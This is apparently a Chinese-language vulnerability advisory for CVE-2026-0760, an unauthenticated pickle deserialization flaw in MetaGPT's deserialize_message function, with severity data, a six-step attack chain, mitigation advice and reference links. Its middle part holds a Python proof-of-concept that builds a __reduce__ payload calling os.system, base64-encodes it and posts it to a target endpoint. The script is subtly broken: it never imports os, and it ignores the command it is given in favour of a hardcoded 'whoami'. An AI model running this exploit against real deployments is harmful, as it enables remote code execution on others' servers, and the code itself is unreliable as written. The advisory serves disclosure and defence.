CVE-2026-0760 MetaGPT deserialize_message 反序列化远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2026-0760

漏洞类型

反序列化漏洞 / 远程代码执行

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Foundation Agents MetaGPT

漏洞概述

CVE-2026-0760是Foundation Agents MetaGPT中存在的一个严重安全漏洞，CVSS评分高达9.8分。该漏洞源于deserialize_message函数缺乏对用户输入数据的正确验证，导致反序列化不受信任的数据。攻击者可以利用此漏洞在受影响系统上远程执行任意代码，执行上下文为服务账户。漏洞无需任何认证即可利用，这意味着任何能够向目标系统发送恶意数据的攻击者都可以触发该漏洞。此漏洞由趋势科技ZDI（Zero Day Initiative）发现并披露，编号为ZDI-CAN-28121。由于MetaGPT是用于AI代理的重要框架，广泛应用于自动化任务和智能体开发，该漏洞的存在对使用该框架的企业和个人开发者构成严重威胁。攻击者通过构造特定的恶意序列化数据，可以绕过安全限制，在服务器上执行系统命令，完全控制受影响系统。

技术细节

该漏洞的核心问题在于deserialize_message函数对反序列化操作缺乏安全验证。具体来说，函数在处理用户提供的序列化数据时，没有进行充分的输入验证和安全检查，导致攻击者可以注入恶意序列化对象。当应用程序使用pickle等不安全的反序列化方式处理外部输入时，攻击者可以构造包含恶意代码的序列化对象。攻击流程包括：首先构造一个包含__reduce__()方法的恶意Python对象，该方法返回执行系统命令的代码；然后将该对象序列化为字节流；最后将序列化后的数据发送到目标系统的deserialize_message函数。目标系统在反序列化时会自动执行__reduce__()方法中定义的代码，从而在服务器上执行任意系统命令。由于反序列化发生在服务端，攻击者可以读取敏感文件、修改系统配置或进一步横向移动。防御此类漏洞的最佳实践是避免反序列化不可信数据，或使用安全的序列化格式如JSON。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标系统使用Foundation Agents MetaGPT框架，并发现deserialize_message端点可访问

STEP 2

步骤2: 构造恶意载荷

攻击者创建一个Python对象，重写__reduce__方法使其返回执行系统命令的函数（如os.system）

STEP 3

步骤3: 序列化恶意载荷

使用pickle将恶意对象序列化为字节流，并进行Base64编码以便于传输

STEP 4

步骤4: 发送攻击请求

将编码后的恶意序列化数据发送到目标的deserialize_message API端点，无需任何认证

STEP 5

步骤5: 触发反序列化

目标系统调用pickle.loads()反序列化数据，自动执行__reduce__方法中定义的代码

STEP 6

步骤6: 远程代码执行

攻击者在目标服务器上成功执行任意系统命令，可获取shell访问权限或进行进一步横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2026-0760 PoC - MetaGPT deserialize_message RCE
# This PoC demonstrates the deserialization vulnerability in MetaGPT

import pickle
import base64
import requests
import sys

class RCEPayload:
    """
    Malicious payload that executes arbitrary commands
    via unsafe deserialization
    """
    def __reduce__(self):
        # Replace 'whoami' with any command you want to execute
        cmd = "whoami"
        return (os.system, (cmd,))

def generate_payload(command):
    """Generate malicious serialized payload"""
    payload = RCEPayload()
    # The RCEPayload class will execute the command during deserialization
    serialized = pickle.dumps(payload)
    return base64.b64encode(serialized).decode()

def exploit(target_url, command):
    """
    Send exploit to target
    target_url: URL of the deserialize_message endpoint
    command: Command to execute on target
    """
    payload = generate_payload(command)
    
    # Construct the request
    exploit_data = {
        "data": payload,
        "format": "pickle"
    }
    
    try:
        response = requests.post(target_url, json=exploit_data, timeout=10)
        print(f"[+] Payload sent successfully")
        print(f"[+] Response: {response.text}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: {sys.argv[0]} <target_url> <command>")
        print(f"Example: {sys.argv[0]} http://target.com/api/deserialize 'id > /tmp/pwned'")
        sys.exit(1)
    
    target = sys.argv[1]
    cmd = sys.argv[2]
    exploit(target, cmd)

# Note: This PoC requires the 'requests' library: pip install requests

影响范围

Foundation Agents MetaGPT（所有未修复版本）

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1）网络层限制，阻止外部访问deserialize_message相关接口；2）实施输入过滤，检测并阻止异常的序列化数据模式；3）监控应用程序日志，关注反序列化相关的异常行为；4）考虑使用应用级防火墙规则阻止pickle格式的数据传输；5）对API端点实施临时认证机制；6）如果业务允许，暂时禁用MetaGPT的反序列化功能。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-0760
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-0760
3 Details https://www.cvedetails.com/cve/CVE-2026-0760/
4 VulDB https://vuldb.com/cve/CVE-2026-0760
5 Link https://www.zerodayinitiative.com/advisories/ZDI-26-026/